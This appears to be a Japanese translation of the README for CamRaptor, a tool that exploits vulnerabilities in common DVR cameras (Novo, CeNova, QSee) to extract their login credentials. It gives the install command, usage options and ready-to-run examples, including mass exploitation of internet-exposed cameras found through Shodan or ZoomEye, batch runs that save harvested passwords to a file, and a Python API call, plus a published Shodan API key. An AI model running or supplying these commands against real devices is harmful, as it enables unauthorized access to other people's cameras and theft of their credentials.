
CamRaptorは、一般的なDVRカメラの複数の脆弱性を悪用して、ネットワークカメラの認証情報を取得するツールです。
Novo、CeNova、QSeeなどの最も一般的なカメラモデルの脆弱性を悪用します。pip3 install git+https://github.com/EntySec/CamRaptor
CamRaptorを使用するには、ターミナルでcamraptorと入力するだけです。
usage: camraptor [-h] [-t] [-o OUTPUT] [-i INPUT] [-a ADDRESS]
[--shodan SHODAN] [--zoomeye ZOOMEYE] [-p PAGES]
CamRaptor is a tool that exploits several vulnerabilities in popular DVR
cameras to obtain network camera credentials.
optional arguments:
-h, --help show this help message and exit
-t, --threads Use threads for fastest work.
-o OUTPUT, --output OUTPUT
Output result to file.
-i INPUT, --input INPUT
Input file of addresses.
-a ADDRESS, --address ADDRESS
Single address.
--shodan SHODAN Shodan API key for exploiting devices over Internet.
--zoomeye ZOOMEYE ZoomEye API key for exploiting devices over Internet.
-p PAGES, --pages PAGES
Number of pages you want to get from ZoomEye.
単一カメラの悪用
楽しみのために自分のカメラをハッキングしてみましょう。
camraptor -a 192.168.99.100
インターネット上のカメラを悪用する
Shodan検索エンジンを使ってインターネット上のカメラを悪用してみましょう。高速な悪用のために-tオプションを使用します。
camraptor -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD
注: 上記のShodan APIキー(PSKINdQe1GyxGgecYz2191H2JoS9qvgD)は私のPRO APIキーです。このキーまたは自分自身のキーを自由に使用してください。すべてのリソースを無料でご利用いただけます:)
入力ファイルからカメラを悪用する
開かれたカメラデータベースを使って高速に悪用してみましょう。-tオプションを使用します。
camraptor -t -i cameras.txt -o passwords.txt
注: これにより、cameras.txtリスト内のすべてのカメラをそのアドレスに基づいて悪用し、取得したすべてのパスワードをpasswords.txtに保存します。
CamRaptorには独自のPython APIも用意されており、コードにCamRaptorをインポートすることで呼び出すことができます。
from camraptor import CamRaptor
以下は、指定されたカメラを悪用するために使用できるCamRaptorの基本関数です。
exploit(address) - 指定されたアドレスの単一カメラを悪用します。単一カメラの悪用
from camraptor import CamRaptor
camraptor = CamRaptor()
creds = camraptor.exploit('192.168.99.100')
print(creds)